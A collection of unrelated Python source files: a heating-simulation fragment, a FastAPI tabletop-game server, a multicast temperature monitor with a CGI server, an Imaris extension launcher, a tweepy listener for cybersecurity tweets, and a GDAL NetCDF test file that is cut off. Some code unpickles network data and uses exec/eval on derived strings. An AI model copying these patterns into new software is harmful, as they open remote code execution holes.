kessel.set_inp_temp(self.t29)
#kessel.calc_mass_flow()
# ..............................................................
# at first no delay - just linking chp and heater
        # delay due to the sequence of commands, i.e. equal to the time step length
self.t27 = self.t1
self.t29 = self.t1
# ..............................................................
# heating circuit
self.t23 = self.t20 # no delay assumed
#print('t20 = {}; t23 = {}'.format(self.t20, self.t23))
self.t25 = heizkurve.get_supply_temperature(t_a)
self.t24 = heizkurve.get_return_temperature(t_a)
heizkurve.calc_volume_flow()
# comprehensive control algorithm - it stays
(m23, m25, m4) = self.control_internal_1(heizkurve, kessel, chp, cvalve, t_a, actual_time, m4, heatc_conf)
m_bypass = m25 - m23
rho23 = utils.rho_fluid_water(self.t23, self.p_atm, 1)
V_23 = m23 / rho23 # in m3/s = kg/s / kg/m3
#print('V_23 = {}; m23 = {}; rho23 = {}; t23 = {}'.format(V_23,m23, rho23, self.t23))
m24 = m23
rho24 = utils.rho_fluid_water(self.t24, self.p_atm, 1)
V_24 = m24 / rho24
# demand for domestic hot water
m22 = self.V_1 * utils.rho_fluid_water(self.t22, self.p_atm, 1) # in kg/s = m3/s * kg/m3
#m22 = 0.01 # kg/s
# ..............................................................
t_ambient = 15.0
# storage tank - calculation
tank.calculate_storage_tank_obj(tsm, # time step manager
self.t23, # hk_inp_temp
V_23, # hk_inp_volfl_m3s
self.t24, # hk_out_temp
self.t27, # chp_inp_temp
self.t26, # chp_out_temp
self.V_3, # chp_inp_volfl_m3s
self.t29, # gb_inp_temp
                                        self.t28, # gb_out_temp
self.V_4, # gb_inp_volfl_m3s
self.t22, # dhw_inp_temp
self.t21, # dhw_out_temp
self.V_1, # dhw_inp_volfl_m3s
el_heat_status, # el_heat_status
actual_time, # time in the timestamp format
t_ambient) # ambient temperature of the tank - defines heat losses to the outside
self.t21 = tank.get_temp_dhw()
#self.t27 =
#self.t29 =
#self.t23 =
# storage tank - linking
[self.t1, self.t2, self.t3, self.t4, self.t5, self.t6, self.t7, self.t8, self.t9, self.t10,
self.t11, self.t12, self.t13, self.t14, self.t15, self.t16, self.t17, self.t18, self.t19, self.t20] = tank.output_temperatures()
# ..............................................................
# get rid of this part
#self.control_internal_2(chp, kessel, actual_time, m4)
# ..............................................................
heizwert_in_MJ_per_kg = 50.0 # kg/m3 N ~CH4
gas_density = 0.79 # kg/m3 N ~Erdgas
Z_boiler = kessel.get_gas_mstr(heizwert_in_MJ_per_kg) / gas_density
self.Z_2 = chp.get_gas_mstr(heizwert_in_MJ_per_kg) / gas_density
self.Z_1 = self.Z_2 + Z_boiler
self.Wh1 = -1.0 * chp.get_el_prod()
self.Wh2 = tank.get_el_heater_consumption()
self.Wh3 = self.Wh1 + self.Wh2 + self.electricity_consumption_kWh
#print('END chp = {}; kessel = {}; heating = {}; t2 = {}; t3 = {};V1 = {}; V2 = {}; V3 = {}; V4 = {}; t_a = {}'.format(chp.get_status(), kessel.get_status(), heizkurve.get_status(), self.t2, self.t3, self.V_1, self.V_2, self.V_3, self.V_4, t_a))
#end one_iteration_step
|
main.py
|
from _runtime import server, CONFIG
from fastapi import FastAPI, Request, Body, Response, status
from fastapi.responses import HTMLResponse, StreamingResponse, FileResponse
from fastapi_utils.tasks import repeat_every
import uvicorn
import rsa
import os
import sys
import hashlib
from pydantic import BaseModel, create_model
from typing import Optional
from util import *
from classes import *
import urllib
import logging
import base64
import json
import random
import time
import pickle
from endpoints import server_endpoint, client_endpoint, compendium_endpoint, character_endpoint, campaign_endpoint, image_endpoint, player_endpoint
from _api import *
from threading import Thread
from markdown2 import Markdown
# Configs
VERSION = 0
logger = logging.getLogger("uvicorn.error")
'''if os.path.exists('prikey.pem') and os.path.exists('pubkey.pem'):
try:
logger.info('Loading RSA keys from PEM files.')
with open('pubkey.pem','rb') as pub:
PUBLIC_KEY = rsa.PublicKey.load_pkcs1(pub.read())
with open('prikey.pem','rb') as pri:
PRIVATE_KEY = rsa.PrivateKey.load_pkcs1(pri.read())
except:
logger.warning('Error loading old keys. Generating new ones.')
PUBLIC_KEY, PRIVATE_KEY = rsa.newkeys(1024,accurate=True)
with open('pubkey.pem','wb') as pub:
pub.write(PUBLIC_KEY.save_pkcs1())
with open('prikey.pem','wb') as pri:
pri.write(PRIVATE_KEY.save_pkcs1())
else:
logger.info('Generating new RSA keys.')
PUBLIC_KEY, PRIVATE_KEY = rsa.newkeys(1024,accurate=True)
with open('pubkey.pem','wb') as pub:
pub.write(PUBLIC_KEY.save_pkcs1())
with open('prikey.pem','wb') as pri:
pri.write(PRIVATE_KEY.save_pkcs1())'''
def ep_reload(endpoint):
try:
data = get5e_direct(endpoint)
with open(os.path.join('database','cached','open5e',endpoint+'.json'),'w') as f:
json.dump(data,f)
#logger.info('Reloaded '+endpoint)
except:
logger.warning('Open5e Endpoint '+endpoint+' is not accessible.')
def reload_open5e_cache(endpoints=['spells','monsters','sections','magicitems']):
threads = []
for endpoint in endpoints:
ep_reload(endpoint)
return threads
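# Usage sketch: reload_cached() below runs this in a background thread so the
# sequential downloads do not block the server, e.g.
#   Thread(target=reload_open5e_cache).start()
# Note that the returned `threads` list is currently always empty.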
# Setup
'''Build database'''
folders = ['users','sessions','campaigns','characters','cached',os.path.join('cached','open5e'),'images']
for f in folders:
try:
os.makedirs(os.path.join('database',f))
with open(os.path.join('database',f,'registry.json'),'w') as reg:
reg.write('{}')
except FileExistsError:
pass
'''reload_open5e_cache()
with open(os.path.join('database','cached','open5e','last_update.ini'),'w') as f:
f.write(str(int(time.time())))
logger.info('Reloaded Open5e Cache.')'''
'''Get OpenAPI configs'''
with open(os.path.join('config','openapi.json'),'r') as c:
openapicfg = json.load(c)
tags_meta = openapicfg['metadata']
# App
# Instantiate server instance - todo add stateful cache
app = FastAPI(openapi_tags=tags_meta)
# Routers
app.include_router(
server_endpoint.router,
prefix='/server',
tags=['server']
)
app.include_router(
client_endpoint.router,
prefix='/client/{fingerprint}',
tags=['client']
)
app.include_router(
compendium_endpoint.router,
prefix='/compendium',
tags=['compendium']
)
app.include_router(
character_endpoint.router,
prefix='/characters/{fingerprint}',
tags=['characters']
)
app.include_router(
campaign_endpoint.router,
prefix='/campaigns/{fingerprint}',
tags=['campaigns']
)
app.include_router(
image_endpoint.router,
prefix='/images',
tags=['images']
)
app.include_router(
player_endpoint.router,
prefix='/campaigns/{fingerprint}/player/{campaign}/{map}',
tags=['player']
)
@app.get('/', response_class=HTMLResponse, include_in_schema=False) # Get index.html when navigated to root
async def groot():
with open(os.path.join('client','index.html'),'r') as f:
return f.read()
@app.get('/characters', response_class=HTMLResponse, include_in_schema=False)
async def gchars():
with open(os.path.join('client','characters.html'),'r') as f:
return f.read()
@app.get('/campaigns', response_class=HTMLResponse, include_in_schema=False)
async def gcamps():
with open(os.path.join('client','campaigns.html'),'r') as f:
return f.read()
@app.get('/help', response_class=HTMLResponse, include_in_schema=False)
async def ghelp():
with open(os.path.join('client','help.html'),'r') as f:
return f.read()
@app.get('/player', response_class=HTMLResponse, include_in_schema=False)
async def gplayer():
with open(os.path.join('client','player.html'),'r') as f:
return f.read()
# Load web server
files = list(os.walk('client'))
slashtype = '/'
aux = '/'
if sys.platform == 'win32':
slashtype = '\\'
aux = '\\\\'
web_paths = []
for f in files:
split_path = f[0].split(slashtype)
if len(split_path) > 1:
new_path = '/'.join(split_path[1:])+'/'
else:
new_path = ''
dirpath = aux.join(f[0].split(slashtype))
for fn in f[2]:
ext = os.path.splitext(fn)[1]
code = '\n'.join([
'@app.get("/'+new_path+fn+'", include_in_schema=False)',
'async def web_'+fn.replace('.','_').replace('-','_').replace(' ','_').replace('\'','').replace('"','')+'():',
'\treturn FileResponse("'+dirpath+aux+fn+'")'
])
web_paths.append(new_path+fn)
exec(
code,
globals(),
locals()
)
logger.info(f'Loaded {len(web_paths)} static files.')
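# The loop above generates one GET route per static file. For a hypothetical file
# client/css/style.css on a POSIX system, the exec'd code is roughly:
#   @app.get("/css/style.css", include_in_schema=False)
#   async def web_style_css():
#       return FileResponse("client/css/style.css")
# (on Windows the FileResponse path uses escaped backslashes instead)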
@app.get('/static/')
async def get_static_file_paths():
global web_paths
return web_paths
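# One-off migration helper: backfills the 'chat' and 'initiative' structures on
# older campaign pickles and re-registers each campaign under its owner.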
def fix():
for _f in [os.path.join('database','campaigns',i) for i in os.listdir(os.path.join('database','campaigns')) if i.endswith('.pkl')]:
with open(_f,'rb') as f:
obj = pickle.load(f)
for m in obj.maps.keys():
if not 'chat' in obj.maps[m].keys():
obj.maps[m]['chat'] = []
nchat = []
if (not eval(CONFIG['RUNTIME']['clear_chat'])):
for c in obj.maps[m]['chat']:
if type(c) == dict:
nchat.append(c)
obj.maps[m]['chat'] = nchat[:]
if not 'initiative' in obj.maps[m].keys():
obj.maps[m]['initiative'] = {
'running':False,
'order':{},
'current':None,
'started':False
}
load_user(obj.owner)
if not obj.id in server.users[obj.owner].owned_campaigns:
server.users[obj.owner].owned_campaigns.append(obj.id)
cache_user(obj.owner)
with open(_f,'wb') as f:
pickle.dump(obj,f)
# Start tasks
@app.on_event('startup')
async def load_users():
reg = get_user_registry()
for u in reg.keys():
if os.path.exists(os.path.join('database','users',u+'.pkl')):
server.users[u] = os.path.join('database','users',u+'.pkl')
fix()
# Load periodic functions
@app.on_event('startup') # Run on startup
@repeat_every(seconds=5) # Run on startup
async def check_connections_task(): # Task to check whether connections have timed out
newconn = {}
oldconn = server.connections.copy() # Create copy of old connections dictionary
for conn in oldconn.keys(): # Iterate through connection IDs
if oldconn[conn].timeout >= time.time(): # If not timed out
newconn[conn] = oldconn[conn] # Add to new dict
else:
logger.info('Timed out connection '+conn)
cache_user(server.connections[conn].uid) # Cache the user object to a pickle file
server.connections = newconn.copy() # Replace the old connections dictionary with the new one
@app.on_event('startup') # Run on startup
@repeat_every(seconds=120) # Run every 2 minutes
async def reload_cached():
if not os.path.exists(os.path.join('database','cached','open5e','last_update.ini')):
with open(os.path.join('database','cached','open5e','last_update.ini'),'w') as f:
f.write(str(int(time.time())))
t = Thread(target=reload_open5e_cache)
t.start()
else:
with open(os.path.join('database','cached','open5e','last_update.ini'),'r') as f:
dat = f.read()
if dat == '':
dat = 0
if int(dat)+600 < time.time() or dat == '':
t = Thread(target=reload_open5e_cache)
t.start()
with open(os.path.join('database','cached','open5e','last_update.ini'),'w') as f:
f.write(str(int(time.time())))
if __name__ == "__main__":
uvicorn.run('main:app', host=CONFIG['RUNTIME']['server_ip'], port=int(CONFIG['RUNTIME']['server_port']), log_level="info", access_log=False)
|
selfserve.py
|
#!/usr/bin/python
# Self Server
import sys
import time
import os
import pickle
import BaseHTTPServer
import CGIHTTPServer
import SocketServer
import SimpleHTTPServer
import socket
import struct
import threading
class mcastThread:
def __del__(self):
try:
self.sock.setsockopt(socket.SOL_IP, socket.IP_DROP_MEMBERSHIP, socket.inet_aton(self.MCAST_GRP) + socket.inet_aton('0.0.0.0'))
except:
pass
def __init__(self):
self.MCAST_GRP = '239.232.168.250'
self.MCAST_PORT = 5087
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.sock.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 20)
self.sock.bind(('', self.MCAST_PORT))
mreq = struct.pack("4sl", socket.inet_aton(self.MCAST_GRP), socket.INADDR_ANY)
self.sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def monitorTemp(self):
while 1:
try:
data, addr = self.sock.recvfrom(1059)
d=pickle.loads(data)
o=open("/tmp/tempresult","w")
o.write(data)
o.close()
for x in d['currentResult']:
sys.stdout.write("%s %s %.4f\t" %(x,d['currentResult'][x]['valid'],d['currentResult'][x]['temperature']))
for c in range(3-len(d['currentResult'])):
sys.stdout.write("--------------- ----- -----\t")
sys.stdout.write("\n")
sys.stdout.flush()
except:
pass
time.sleep(0.75)
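# The multicast payload is a pickled dict; monitorTemp() above expects a
# 'currentResult' mapping of sensor name -> {'valid': ..., 'temperature': ...}
# (inferred from the reader loop, not from a separate spec).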
print """
=========================================================
Launching Local Server:
To access use: http://localhost:54661/
=========================================================
"""
if not os.path.exists("index.html"):
o=open("index.html","w")
o.write("""
<script language="Javascript">
window.location.replace("metroui/index.py");
</script>
""")
o.close()
class ThreadingSimpleServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
pass
if __name__ == '__main__':
mcastThread=mcastThread()
mcastTempMonitorThread = threading.Thread(target=mcastThread.monitorTemp)
mcastTempMonitorThread.daemon=True
mcastTempMonitorThread.start()
handler = CGIHTTPServer.CGIHTTPRequestHandler
server = ThreadingSimpleServer(('', 54661), handler)
handler.cgi_directories = ["/metroui"]
try:
while 1:
sys.stdout.flush()
server.handle_request()
except KeyboardInterrupt:
print "Finished"
|
ExtensionDriver.py
|
# =========================================================================
#
# Copyright Ziv Yaniv
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# =========================================================================
import sys
import os
import glob
import importlib
from functools import partial
import xml.etree.ElementTree as et
from PySide2.QtWidgets import QApplication, QAction, QLabel, QMainWindow
import qdarkstyle
"""
This script serves as a driver for Imaris extensions, allowing us to run them
without requiring the Imaris program. This only works for the extensions that
were designed with this in mind (standalone GUI programs). The locations of the
extensions can be specified on the commandline as a list of paths. The default
location is assumed to be the same as the location of this script.
"""
class ExtensionDriverDialog(QMainWindow):
def __init__(self, extension_paths):
super(ExtensionDriverDialog, self).__init__()
self.__create_gui(self.__load_extensions(extension_paths))
self.setWindowTitle("Imaris Extensions Driver")
self.show()
def __load_extensions(self, extension_paths):
        # The Imaris convention assumes the extensions are in files with a file
        # extension of '.py'; this also matters when loading with importlib,
        # otherwise the importlib code below needs to be modified. The extension
        # description is found in a comment in the file with the following xml
        # structure (the Submenu tag is optional).
# <CustomTools>
# <Menu>
# <Submenu name="Name of Sub Menu">
# <Item name="Name of Extension" icon="Python3" tooltip="Extension tooltip">
# <Command>Python3XT::ExtensionFunctionName(%i)</Command>
# </Item>
# </Submenu>
# </Menu>
# </CustomTools>
potential_extension_files = []
for path in extension_paths:
potential_extension_files.extend(
glob.glob(os.path.join(os.path.abspath(path), "*.py"))
)
extensions = []
for file_name in potential_extension_files:
with open(file_name, "r") as fp:
lines = fp.readlines()
# The extension description is contained as xml in a comment so
# get all comments from the file.
comments = []
current_comment = ""
for ln in lines:
if ln.strip().startswith("#"):
current_comment = current_comment + ln.strip(" \t\n#")
elif current_comment:
comments.append(current_comment)
current_comment = ""
for comment in comments:
# Search for the imaris xml data in each comment.
xml_start = comment.find("<CustomTools>")
xml_end = comment.find("</CustomTools>") + len("</CustomTools>")
if xml_start != -1 and xml_end != -1:
comment = comment[xml_start:xml_end]
try:
elem = et.fromstring(comment)
if elem.tag == "CustomTools": # This is an extension
elem = elem.find("Menu")
submenu_name = None # optional sub menu
if elem.find("Submenu"):
elem = elem.find("Submenu")
submenu_name = elem.get("name")
elem = elem.find("Item")
ext_name = elem.get("name")
ext_tooltip = elem.get("tooltip")
# Clunky parsing of the command string, but I prefer two splits over 'import re'
ext_command = (
elem.find("Command").text.split(":")[-1].split("(")[0]
)
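                            # e.g. "Python3XT::ExtensionFunctionName(%i)" -> "ExtensionFunctionName"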
# import the extension and get the pointer to the function, ensures that this is
# an imaris extension.
spec = importlib.util.spec_from_file_location(
os.path.split(file_name)[1][:-3], file_name
)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
getattr(module, ext_command)
# extensions.append([submenu_name, ext_name, ext_tooltip, getattr(module,ext_command)])
extensions.append(
[submenu_name, ext_name, ext_tooltip, file_name]
)
break # Ignore any additional extension descriptions in the file
except Exception:
pass
return extensions
def __launch(self, script_to_run):
# running a function in another process doesn't seem to work on OSX,
# crashes, appears to be a known bug: https://bugs.python.org/issue33725
# from multiprocessing import Process
# p = Process(target=f)
# p.daemon = True
# p.start()
import subprocess
subprocess.Popen(
[sys.executable, script_to_run],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
def __create_gui(self, extensions_list):
menu_bar = self.menuBar()
# Force menubar to be displayed in the application on OSX/Linux, otherwise it
# is displayed in the system menubar
menu_bar.setNativeMenuBar(False)
extensions_menu = menu_bar.addMenu("Imaris Extensions")
sub_menus = {}
for extension in extensions_list:
if extension[0]:
try:
sub_menu = sub_menus[extension[0]]
except Exception: # create the sub menu only once
sub_menu = extensions_menu.addMenu(extension[0])
sub_menus[extension[0]] = sub_menu
else:
sub_menu = extensions_menu
extensionAction = QAction(extension[1], self)
extensionAction.setToolTip(extension[2])
extensionAction.triggered.connect(partial(self.__launch, extension[3]))
sub_menu.addAction(extensionAction)
sub_menu.setToolTipsVisible(True)
self.setCentralWidget(
QLabel(
"This program allows you to run imaris extensions that are designed to work as standalone programs.\n"
+ "Select the extension you want to run from the menu-bar."
)
)
if __name__ == "__main__":
app = QApplication(sys.argv)
app.setStyle(
"Windows"
) # Always use windows style as that is our users' main platform
app.setStyleSheet(qdarkstyle.load_stylesheet(qt_api="pyside2"))
# default directory containing extensions is the same as the one containing
# this script (don't use '.' as that refers to the working directory).
extenstions_directories = [os.path.dirname(os.path.abspath(__file__))]
for dir_name in sys.argv[1:]:
if os.path.isdir(dir_name):
extenstions_directories.append(dir_name)
driver = ExtensionDriverDialog(extension_paths=extenstions_directories)
sys.exit(app.exec_())
|
listeners.py
|
"""
Custom listeners for monitoring cybersecurity tweets.
"""
import configparser
import csv
import os
import sys
import time
from http.client import IncompleteRead as http_incompleteRead
from queue import Queue
from threading import Thread
from urllib3.exceptions import IncompleteRead as urllib3_incompleteRead
import tweepy
from megatick.database import tweet_to_neo4j, link_tweets, get_tweet_node
from megatick.scraper import Scraper
from megatick.utils import get_full_text, get_urls, tweet_is_notable
class MegatickStreamListener(tweepy.StreamListener):
"""A tweepy StreamListener with custom error handling."""
def __init__(self, api=None, graph=None, prefix=None):
"""Initialize MegatickStreamListener"""
super().__init__(api=api)
print("Initializing listener")
# load configuration
self.conf = configparser.ConfigParser()
self.conf.read("config.ini")
# Neo4j database graph or None
self.graph = graph
# status_queue (single-threaded) for handling tweets as they come in
# without binding up
self.status_queue = Queue(maxsize=0)
status_thread = Thread(target=self.record_status)
status_thread.start()
# read list of blacklisted user IDs to filter out.
# NB: long numbers (stored as strings) rather than handles which change
self.user_blacklist = None
if self.conf.has_option("twitter", "userBlacklistLoc"):
user_blacklist_loc = self.conf.get("twitter", "userBlacklistLoc")
with open(user_blacklist_loc, "r") as bl_file:
self.user_blacklist = [line.strip() for line in bl_file]
# read list of blacklisted terms and join them using | (or) for regex
# searches
self.kw_blacklist = None
if self.conf.has_option("twitter", "keywordBlacklistLoc"):
kw_blacklist_loc = self.conf.get("twitter", "keywordBlacklistLoc")
with open(kw_blacklist_loc, "r") as bl_file:
pieces = [line.strip() for line in bl_file]
self.kw_blacklist = "|".join(pieces)
# if no graph, then print header to csv
if self.graph is None:
output_location = self.conf.get("twitter", "tweetsLoc")
print("printing csv to " + output_location)
# establish a filename with the current datetime
filename = time.strftime("%Y-%m-%dT%H-%M-%S") + ".csv"
if prefix is not None:
filename = prefix + "_" + filename
# Create a new file with that filename
self.csv_file = open(os.path.join(output_location, filename), "w")
# create a csv writer
self.csv_writer = csv.writer(self.csv_file)
# write a single row with the headers of the columns
self.csv_writer.writerow(["text",
"created_at",
"geo",
"lang",
"place",
"coordinates",
"user.favourites_count",
"user.statuses_count",
"user.description",
"user.location",
"user.id",
"user.created_at",
"user.verified",
"user.following",
"user.url",
"user.listed_count",
"user.followers_count",
"user.default_profile_image",
"user.utc_offset",
"user.friends_count",
"user.default_profile",
"user.name",
"user.lang",
"user.screen_name",
"user.geo_enabled",
"user.time_zone",
"id",
"favorite_count",
"retweeted",
"source",
"favorited",
"retweet_count"])
# flush to force writing
self.csv_file.flush()
# when using Neo4j graph, also retrieve sites and twitter threads
else:
self.thread_queue = Queue(maxsize=0)
thread_thread = Thread(target=self.get_thread)
thread_thread.start()
self.scraper = Scraper(self.conf, self.graph)
# see https://github.com/tweepy/tweepy/issues/908#issuecomment-373840687
def on_data(self, raw_data):
"""
This function overloads the on_data function in the tweepy package.
It is called when raw data is received from tweepy connection.
"""
# print("received data")
try:
super().on_data(raw_data)
return True
except http_incompleteRead as error:
print("http.client Incomplete Read error: %s" % str(error))
print("Restarting stream search in 5 seconds...")
time.sleep(5)
return True
except urllib3_incompleteRead as error:
print("urllib3 Incomplete Read error: %s" % str(error))
print("Restarting stream search in 5 seconds...")
time.sleep(5)
return True
except BaseException as error:
print("Error on_data: %s, Pausing..." % str(error))
time.sleep(5)
return True
def on_status(self, status):
"""
When a status is posted, sends it to a queue for recording.
Using a queue prevents back-ups from high volume.
Args:
status: a tweet with metadata
"""
print("found tweet")
try:
self.status_queue.put(status)
except BaseException as error:
print("Error on_status: %s, Pausing..." % str(error))
time.sleep(5)
# print(str(len(self.status_queue.queue)) + " items in status_queue")
def on_error(self, status_code):
"""Print error codes as they occur"""
print("Encountered error with status code:", status_code)
# End the stream if the error code is 401 (bad credentials)
if status_code == 401:
return False
return True
def on_delete(self, status_id, user_id):
"""Note deleted tweets but do nothing else."""
print("Delete notice")
return True
def on_limit(self, track):
"""Sleep and retry upon rate limit."""
# Print rate limiting error
print("Rate limited, waiting 15 minutes")
# Wait 15 minutes
time.sleep(15 * 60)
# Continue mining tweets
return True
def on_timeout(self):
"""Sleep and retry when timed out."""
# Print timeout message
print(sys.stderr, "Timeout...")
# Wait 10 seconds
time.sleep(10)
# Continue mining tweets
return True
def get_thread(self, show_rate_limit=None):
"""
        Worker loop: pull a (tweet, parent ID) pair from the thread queue,
        fetch the parent status (the tweet it quotes or replies to), record it,
        link the two tweets, and recursively follow the parent's own links.
"""
# Time between requests to avoid overrunning rate limit
if show_rate_limit is None:
show_rate_limit = self.conf.getfloat("twitter", "showRateLimit")
while True:
# get next tweet and parent ID from queue
later_status, earlier_id = self.thread_queue.get()
try:
# sleep first to respect rate limit
time.sleep(show_rate_limit)
# ask for status using GET statuses/show/:id
# TODO: batch these to get up to 100 using statuses/lookup
earlier_status = self.api.get_status(earlier_id)
except BaseException as error:
print("Error get_thread: %s, Pausing..." % str(error))
time.sleep(5)
# no available status at that ID (deleted or nonexistent)
self.thread_queue.task_done()
continue
# sanity check for content
if hasattr(earlier_status, "user"):
# record status
tweet_to_neo4j(self.graph, earlier_status)
# add link to graph to recreate Twitter threading
link_tweets(self.graph, later_status, earlier_status)
# recursive call to follow outgoing links
self.follow_links(earlier_status)
self.thread_queue.task_done()
def record_status(self):
"""
Pulls a status from the queue and records it.
"""
while True:
status = self.status_queue.get()
notable = tweet_is_notable(status,
user_blacklist=self.user_blacklist,
kw_blacklist=self.kw_blacklist)
# check for notability, currently hardcoded as English and not RT
            # TODO: make this modular to allow ML/rule-based models of notability
if not notable:
# print("not notable, language=" + status.lang + " " + status.text)
continue
# print("writing " + str(status.id))
# If no Neo4j graph, write to csv
if self.graph is None:
try:
# print("trying to write " + str(status.id) + " to csv")
self.write_status_to_csv(status)
except Exception as error:
print(error)
# Neo4j graph is available, so write to it
else:
# add tweet to Neo4j graph
tweet_to_neo4j(self.graph, status)
# recursive call to follow outgoing links
self.follow_links(status)
# in case we need side effects for finishing a task, mark complete
self.status_queue.task_done()
def write_status_to_csv(self, status):
"""Write a status in flat format (not following links)"""
full_text = get_full_text(status)
# Write the tweet's information to the csv file
self.csv_writer.writerow([full_text,
status.created_at,
status.geo,
status.lang,
status.place,
status.coordinates,
status.user.favourites_count,
status.user.statuses_count,
status.user.description,
status.user.location,
status.user.id,
status.user.created_at,
status.user.verified,
status.user.following,
status.user.url,
status.user.listed_count,
status.user.followers_count,
status.user.default_profile_image,
status.user.utc_offset,
status.user.friends_count,
status.user.default_profile,
status.user.name,
status.user.lang,
status.user.screen_name,
status.user.geo_enabled,
status.user.time_zone,
status.id_str,
status.favorite_count,
status.retweeted,
status.source,
status.favorited,
status.retweet_count])
# flush to force writing
self.csv_file.flush()
def follow_links(self, status, urls=None):
"""
Follow (quote, reply, external) links and add them to queues. This
is accomplished through threads to avoid blocking up stream.filter
"""
if urls is None:
urls = get_urls(status)
if len(urls) > 0:
# add url to scrape queue
self.scraper.link(get_tweet_node(self.graph, status), urls)
if status.is_quote_status:
# add upstream quote-tweet thread to download pipe
prev_id = status.quoted_status_id
self.thread_queue.put((status, prev_id))
if status.in_reply_to_status_id is not None:
# add upstream tweet reply thread to download pipe
prev_id = status.in_reply_to_status_id
self.thread_queue.put((status, prev_id))
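# Usage sketch (a minimal illustration for the tweepy 3.x streaming API; the
# credential variables are placeholders, not defined in this module):
#   auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
#   auth.set_access_token(access_token, access_token_secret)
#   api = tweepy.API(auth)
#   listener = MegatickStreamListener(api=api, graph=None, prefix='cyber')
#   stream = tweepy.Stream(auth=api.auth, listener=listener)
#   stream.filter(track=['cybersecurity'])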
|
netcdf.py
|
#!/usr/bin/env pytest
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test NetCDF driver support.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2007, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2008-2016, Even Rouault <even.rouault at spatialys.com>
# Copyright (c) 2010, Kyle Shannon <kyle at pobox dot com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import sys
import shutil
import struct
from osgeo import gdal
from osgeo import ogr
from osgeo import osr
import pytest
import gdaltest
import test_cli_utilities
from uffd import uffd_compare
###############################################################################
# Netcdf Functions
###############################################################################
###############################################################################
# Get netcdf version and test for supported files
@pytest.fixture(autouse=True, scope='module')
def netcdf_setup():
# NOTE: this is also used by netcdf_cf.py
gdaltest.netcdf_drv_version = 'unknown'
gdaltest.netcdf_drv_has_nc2 = False
gdaltest.netcdf_drv_has_nc4 = False
gdaltest.netcdf_drv_has_hdf4 = False
gdaltest.netcdf_drv_silent = False
gdaltest.netcdf_drv = gdal.GetDriverByName('NETCDF')
if gdaltest.netcdf_drv is None:
pytest.skip('NOTICE: netcdf not supported, skipping checks')
# get capabilities from driver
metadata = gdaltest.netcdf_drv.GetMetadata()
if metadata is None:
pytest.skip('NOTICE: netcdf metadata not found, skipping checks')
# netcdf library version "3.6.3" of Dec 22 2009 06:10:17 $
# netcdf library version 4.1.1 of Mar 4 2011 12:52:19 $
if 'NETCDF_VERSION' in metadata:
v = metadata['NETCDF_VERSION']
v = v[0: v.find(' ')].strip('"')
gdaltest.netcdf_drv_version = v
if 'NETCDF_HAS_NC2' in metadata \
and metadata['NETCDF_HAS_NC2'] == 'YES':
gdaltest.netcdf_drv_has_nc2 = True
if 'NETCDF_HAS_NC4' in metadata \
and metadata['NETCDF_HAS_NC4'] == 'YES':
gdaltest.netcdf_drv_has_nc4 = True
if 'NETCDF_HAS_HDF4' in metadata \
and metadata['NETCDF_HAS_HDF4'] == 'YES':
gdaltest.netcdf_drv_has_hdf4 = True
print('NOTICE: using netcdf version ' + gdaltest.netcdf_drv_version +
' has_nc2: ' + str(gdaltest.netcdf_drv_has_nc2) + ' has_nc4: ' +
str(gdaltest.netcdf_drv_has_nc4))
gdaltest.count_opened_files = len(gdaltest.get_opened_files())
@pytest.fixture(autouse=True, scope='module')
def netcdf_teardown():
diff = len(gdaltest.get_opened_files()) - gdaltest.count_opened_files
assert diff == 0, 'Leak of file handles: %d leaked' % diff
###############################################################################
# test file copy
# helper function needed so we can call Process() on it from netcdf_test_copy_timeout()
def netcdf_test_copy(ifile, band, checksum, ofile, opts=None, driver='NETCDF'):
# pylint: disable=unused-argument
opts = [] if opts is None else opts
test = gdaltest.GDALTest('NETCDF', '../' + ifile, band, checksum, options=opts)
return test.testCreateCopy(check_gt=0, check_srs=0, new_filename=ofile, delete_copy=0, check_minmax=0)
###############################################################################
# test file copy, optional timeout arg
def netcdf_test_copy_timeout(ifile, band, checksum, ofile, opts=None, driver='NETCDF', timeout=None):
from multiprocessing import Process
drv = gdal.GetDriverByName(driver)
if os.path.exists(ofile):
drv.Delete(ofile)
if timeout is None:
netcdf_test_copy(ifile, band, checksum, ofile, opts, driver)
else:
sys.stdout.write('.')
sys.stdout.flush()
proc = Process(target=netcdf_test_copy, args=(ifile, band, checksum, ofile, opts))
proc.start()
proc.join(timeout)
# if proc is alive after timeout we must terminate it, and return fail
# valgrind detects memory leaks when this occurs (although it should never happen)
if proc.is_alive():
proc.terminate()
if os.path.exists(ofile):
